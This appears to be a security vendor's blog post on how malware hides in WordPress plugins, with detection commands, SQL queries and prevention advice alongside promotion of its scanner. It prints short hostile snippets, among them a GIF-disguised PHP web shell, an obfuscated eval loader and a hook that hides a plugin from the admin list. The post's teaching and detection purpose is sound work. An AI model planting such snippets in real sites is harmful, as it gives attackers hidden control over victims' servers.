Nulled plugins are an obvious malware vector — everyone knows not to use pirated software. But attackers have become much more sophisticated. Today, malware is regularly found inside:
- Legitimate plugins with compromised update servers
- Abandoned plugins that haven't been audited in years
- Plugins with dependency confusion vulnerabilities
Here's how the obfuscation actually works.
The eval(base64_decode) pattern
The most common PHP malware pattern is dead simple:
<?php eval(base64_decode('cGhwaW5mbygpOw==')); ?>
That base64 string decodes to phpinfo(); in this example — but in a real attack it's hundreds of lines of backdoor code. The eval() executes whatever the decoded string contains.
WO Security Shield flags this as a critical finding regardless of what the base64 decodes to. The pattern itself is the red flag.
Chained encoding
More advanced malware chains multiple obfuscation layers:
eval(str_rot13(base64_decode(gzinflate(base64_decode('...')))));
This applies ROT-13, base64, and GZIP compression in sequence. The result is virtually unreadable without running it. For a comprehensive look at these techniques, see WordPress malware obfuscation techniques. WO Security Shield catches every combination of these chained patterns.
The create_function trick
Before it was deprecated in PHP 7.2, create_function was widely used to create anonymous functions from dynamically constructed strings:
$f = create_function('', base64_decode($payload));
$f();
Even though create_function is removed from PHP 8, servers running older PHP versions are still vulnerable.
Hiding in image files
Some malware embeds PHP in what appear to be image files:
GIF89a<?php eval($_POST['cmd']); ?>
When uploaded as a .gif file, Apache or Nginx may execute it as PHP if misconfigured. WO Security Shield's uploads scanner specifically looks for executable code in the uploads directory.
The self-hiding plugin
The most insidious variant hooks into WordPress itself to hide its own presence:
add_filter('all_plugins', function($plugins) {
unset($plugins[plugin_basename(__FILE__)]);
return $plugins;
});
This makes the malicious plugin invisible in the WordPress admin panel. You'll never see it in Plugins → Installed Plugins. WO Security Shield detects this pattern and flags it as critical because no legitimate plugin should ever hide itself.
How WO Security Shield finds it all
WO Security Shield uses three independent detection layers:
- Signature matching — 70+ regex patterns covering every known obfuscation technique
- Behavioral scoring — weighted scoring system that catches novel obfuscation even without a matching signature
- File integrity baseline — any file that changes between scans triggers an alert, regardless of content
This multi-layer approach means that even zero-day malware using previously unseen obfuscation will still be caught by the behavioral scorer, even if it slips past the signature scanner.
Start your free trial at wosecurity.com.
Detection Techniques: How to Find Hidden Malware
Knowing how malware hides is only useful if you know how to find it. Here are practical detection methods for each hiding technique:
Detecting Encoded Payloads
Search your plugin files for common encoding functions used maliciously:
# Find base64 + eval combinations
grep -r "eval(base64_decode" wp-content/plugins/
# Find gzinflate chains
grep -r "gzinflate(base64_decode" wp-content/plugins/
# Find hex-encoded strings being evaluated
grep -r "\\x[0-9a-fA-F]\{2\}" wp-content/plugins/ --include="*.php" | grep -i eval
Not every match is malicious — some legitimate plugins use base64 for encoding assets. But eval(base64_decode()) is a red flag 95% of the time.
Detecting File Timestamp Manipulation
Malware often backdates its files to blend in:
# Find PHP files modified recently but with old timestamps
find wp-content/plugins -name "*.php" -newer wp-content/plugins/index.php
# Compare file dates against plugin installation dates
stat -c "%y %n" wp-content/plugins/*/
WO Security Shield's file integrity monitoring catches this automatically — it tracks actual file content hashes, not timestamps.
Detecting Database-Stored Malware
Check for code stored in WordPress options or post meta:
-- Find options containing PHP code indicators
SELECT option_name, LEFT(option_value, 200)
FROM wp_options
WHERE option_value LIKE '%eval(%'
OR option_value LIKE '%base64_decode(%'
OR option_value LIKE '%<?php%';
-- Check for suspicious widgets
SELECT option_value FROM wp_options
WHERE option_name = 'widget_text'
AND option_value LIKE '%<script%';
Detecting Backdoor Accounts
-- Find admin accounts created after your site launch
SELECT user_login, user_email, user_registered
FROM wp_users
JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'
ORDER BY user_registered DESC;
Any admin account you don't recognise should be investigated immediately.
Prevention: Keeping Malware Out of Your Plugins
Vetting plugins before installation
- Check the plugin's WordPress.org page — look at last update date, number of active installations, and support forum activity
- Review the changelog — regular security patches indicate active maintenance
- Search for CVEs — check wpscan.com and nvd.nist.gov for known vulnerabilities
- Never use nulled plugins — they're the #1 source of pre-installed backdoors
Ongoing monitoring
- File integrity scanning — detect changes to plugin files immediately
- Regular plugin audits — remove plugins you no longer use
- Auto-updates for security patches — don't wait for manual review on security fixes
- Activity logging — track when plugins are installed, activated, or modified
When a plugin is compromised
If a legitimate plugin you use gets compromised (supply chain attack):
- Deactivate and delete the plugin immediately
- Scan your entire site for backdoors the compromised version may have installed
- Check if the plugin has released a security update
- Monitor WordPress.org and security advisories for official guidance
- Review your activity log for any actions taken while the compromised version was active
The WordPress plugin ecosystem's openness is both its greatest strength and its biggest security challenge. The combination of careful plugin selection, ongoing monitoring, and a security plugin that watches for file changes gives you the best defence.